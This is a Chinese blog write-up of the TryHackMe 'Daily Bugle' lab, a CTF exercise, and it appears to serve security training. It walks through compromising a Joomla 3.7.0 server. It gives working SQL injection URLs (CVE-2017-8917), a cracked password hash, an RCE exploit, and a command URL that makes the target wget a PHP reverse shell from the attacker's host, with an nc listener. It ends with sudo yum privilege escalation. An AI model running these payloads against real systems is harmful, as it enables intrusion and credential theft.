THM-Daily Bugle-joomla&sql报错注入&rce-sudo yum提权

已于 2024-01-20 19:30:00 修改
阅读量371 收藏 9
点赞数 9
分类专栏: linux靶机 THM靶机 文章标签: 安全 web安全
于 2024-01-06 16:48:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangmahaonan/article/details/135427610
版权

1.端口扫描

2.Web渗透

用dirsearch扫描一下网站目录

试了几次只有/administrator能进去

可以看到这是个Joomla-CMS,用joomscan扫描一下

可以看到joomla版本是3.7.0,搜索一下相关漏洞,发现可以进行报错注入

参考:joomla 3.7 SQL Injection(CVE-2017-8917)漏洞复现 - 简书 (jianshu.com)

 http://10.10.12.235/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x3a,user(),0x3a),0) 

经过实验,爆出来的表名不完整,可以加上HEX()函数使其变为16进制 

 http://10.10.12.235/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=UpdateXML(2,%20concat(0x3a,(SELECT(SUBSTRING(HEX(TABLE_NAME),%201,%2020))FROM(information_schema.tables)%20where%20table_schema=database()%20LIMIT%200,1),0x3a),1)

最后发现有70多个表(吐了),其中有个表是users,可以看到用户和密码

其实原来这里有个爆破脚本的(晕),脚本地址:exploits/Joomblah/joomblah.py at master · XiphosResearch/exploits · GitHub 

用户名是jonah,密码是$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

这里的密码还需要用john来解密出来 

最终密码是spiderman123,现在可以登录进去了

关于joomla还有一个rce漏洞:(CVE-2020-10238)

参考:(CVE-2020-10238)Joomla远程代码执行_open source matters-CSDN博客

脚本地址:CVE-2020-10238/CVE-2020-10238/RCE.py at master · HoangKien1020/CVE-2020-10238 · GitHub 成功执行脚本,现在网页进入http://10.10.12.235/templates/protostar/error.php?cmd=whoami 

可以看到已经成功rce,接下来就是反弹shell了

本地开启http服务

http://10.10.12.235/templates/protostar/error.php?cmd=wget http://10.2.93.221:8000/php-reverse-shell.php

 网页成功下载本地php木马, 接下来本地监听1234端口,再激活木马即可

nc -lnvp 1234

http://10.10.12.235/templates/protostar/php-reverse-shell.php

成功反弹shell

3.权限提升

 我们刚才拿到apache用户的shell,搜索一下user.txt

没有权限进入jjameson用户,去其他地方看了一下也没有能提权的方法

接下来进入/var/www/html查看配置文件

查看configuration.php

这里有一串password是,经过尝试并不是root的密码而是jjameson的

通过ssh登录jjameson用户

成功登录进来,查看user.txt

sudo -l

可以运行sudo yum ,搜索exp

成功拿下root权限

yang_boxmaster
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Joomla 3.7.0 (CVE-2017-8917) 漏洞测试
sun1296825481的博客
12-11 2950
Joomla 3.7.0 (CVE-2017-8917) 漏洞测试 本漏洞测试使用的是虚拟机Ubuntu 18.04 LTS 一、环境搭建 1、docker的安装 .更新apt包索引 sudo apt-get update .安装以下包以使apt可以通过HTTPS使用存储库(repository) sudo apt-get install -y apt-transport-http...
THM-HackPark-密码爆破--rce-WinPEAS提权
yangmahaonan的博客
01-01 422
可以看到系统隔半分钟执行一次Message.exe,这样我们可以再上传一个反弹shell木马替换掉该文件就能让系统执行我们的木马,普通shell的权限不能使用mv命令,我们利用msf升级为meterpreter shell。有了足够的权限,我们先覆盖掉原来的Message.exe,再上传假的Message.exe木马(注意这里需要再开一个msf接收root shell)查看Events日志文件,目录下有一个文件:20198415519.INI_LOG.txt。猜测用户名是admin,密码用bp爆破一下。
THM-Skynet-RFL-crontab通配符注入提权
yangmahaonan的博客
01-04 1184
attention.txt中是Miles Dyson说最近系统损坏改了密码,而log1.txt是一个密码本,猜测Miles Dyson改完的密码就在log1.txt中,我们回到登录网页,用Burp再次爆破(注意username是milesdyson)可以重置SMB服务的密码,而我们前面看到的只有milesdyson用户,我们可以重置一下密码然后登录SMB服务。logs文件夹中的log1.txt有内容,我们下载attention.txt和log1.txt查看。可以看到可疑文件backup.sh,查看内容。
THM--Vulnversity--文件上传--suid systemctl提权
yangmahaonan的博客
12-29 379
照着这部分写,把"id > /tmp/output"换成"chmod +s /bin/bash"即可。靶机开放http端口是3333,查看一下网页。查找suid标识的文件。
thm-discord-bot:TryHackMe Python Bot
01-28
不和谐机器人 TryHackMe Python不和谐机器人来源:由DarkStar7471 aka Jon创建 描述: 为在TryHackMe不和谐聊天服务器上使用而创建的机器人。 相关托管链接 ... 贡献者 黑暗之星7471 初始提交和创建,初始嵌齿轮和...
THM3060--Reader-Source.rar_THM3060
07-15
THM3060读卡器的实现与解析》 在信息技术领域,硬件设备的驱动程序和应用程序的开发是至关重要的环节。本篇将详细探讨基于同方芯片THM3060的读卡器实现代码,以及相关知识点。 THM3060是一款由同方公司推出的高...
arsnova-mobile:ARSnova是THM开发的基于网络的新型受众响应系统
02-04
ARSnova ARSnova是一种基于Web的现代受众响应系统(ARS)方法。 它是的基础,并根据开放源代码许可证发布。 ARSnova 2 ARSnova 2包含两个项目:Web客户端(“ ARSnova Mobile”)和后端。 该存储库包含Web客户端...
tryhackme-writeups:TryHackMe的文章
02-11
tryhackme撰写用英语编写的TryHackMe房间的内容(演练和挑战)​​。免责声明撰写内容应具有指向TryHackMe的链接,并且不应包含任何密码/破解的哈希/标志按字母顺序对房间排序有关参考链接,请使用您的pseudo-...
os-thm-js:Javascript和Web的开源主题
05-17
OS-THM JS Depcrapted see: https://github.com/ThatCakeID/os-thm-js/issues/3 当前版本:0.2-alpha os-thm(代表:opensource-theme)是一款可以管理,编辑,导入,导出或删除主题的软件。 os-thm的关键功能之...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1139
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
TSINGSEE青犀视频官方技术博客
07-10 1182
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
网络设备安全
weixin_48579910的博客
07-11 913
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约
rolt的专栏
07-10 811
系统的外部可观察行为和物理特征
网络安全威胁情报到底是什么
学-> 思->用
07-10 406
网络安全威胁情报是提升组织安全态势的重要手段,通过收集和分析各种威胁信息,组织可以更有效地预防、检测和响应网络攻击。威胁情报的构成要素包括指标、TTPs、威胁行为体、漏洞、恶意软件和攻击事件。通过合理应用威胁情报,组织可以增强防御能力、提升事件响应效率,并通过情报共享与合作,共同应对复杂多变的网络威胁。
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 518
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
使用Python实现深度学习模型:模型安全与防御
Echo_Wish的博客
07-12 466
通过以上步骤,我们实现了一个简单的深度学习模型的安全与防御。我们使用CleverHans库生成对抗性样本,并通过对抗性训练提高模型的防御能力。对抗性样本是通过对原始输入进行微小扰动生成的,目的是欺骗模型。我们将使用CleverHans库生成对抗性样本。为了提高模型的防御能力,我们可以使用对抗性训练的方法。对抗性训练是将对抗性样本加入到训练集中进行训练。我们将使用MNIST数据集训练一个简单的卷积神经网络(CNN)模型。我们可以通过对抗性样本评估防御后的模型效果。首先,我们需要安装所需的Python库。
移动应用安全需求分析与安全保护工程
最新发布
weixin_48579910的博客
07-12 1085
移动应用安全面临许多威胁,包括数据泄露、恶意软件、应用漏洞、不安全的网络通信和数据存储等。通过实施数据保护、安全编码、网络通信安全、应用加固、权限管理、安全更新和用户教育等措施,可以有效地提高移动应用的安全性,保护用户数据和隐私。综合采用安全开发生命周期(SDL)和持续安全监控与响应策略,确保移动应用在整个生命周期内的安全性。Android系统通过一系列系统级、应用级和用户级的安全机制,提供了全面的保护。应用沙盒、权限模型、SELinux、数据加密、应用签名、代码混淆等措施,有效地防止了多种安全威胁。
护佑未来!引领儿童安全新时代的AI大模型
qq_42538588的博客
07-10 1088
随着人工智能技术的飞速发展,人们开始意识到AI在儿童安全方面具有巨大的潜在作用。传统的儿童安全教育通常需要大量的人力物力投入,而且存在一定的局限性,例如传统的教育方法可能无法覆盖到每个儿童,也难以做到实时监控和预防潜在的安全风险。而AI技术恰恰可以弥补这些不足,为儿童安全提供更加全面、精准的保障。
ar x libxxx.a gcc -shared -o libxxx.so *.o报错/usr/bin/gcc-linaro-5.3-2016.02-x86_64_arm-linux-gnueabihf/bin/../lib/gcc/arm-linux-gnueabihf/5.3.1/../../../../arm-linux-gnueabihf/bin/ld: buffer_frame.o: relocation R_ARM_THM_MOVW_ABS_NC against `a local symbol' can not be used when making a shared object; recompile with -fPIC buffer_frame.o: error adding symbols: 错误的值 collect2: error: ld returned 1 exit status
06-02
这个错误是由于在编译时缺少 -fPIC 选项导致的。-fPIC 选项是编译动态链接库时必须加上的选项之一。在重新编译时,你需要使用以下命令: ``` gcc -fPIC -c *.c ar rcs libxxx.a *.o gcc -shared -o libxxx.so *.o ``` 这将在编译时添加 -fPIC 选项,并生成静态链接库和动态链接库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值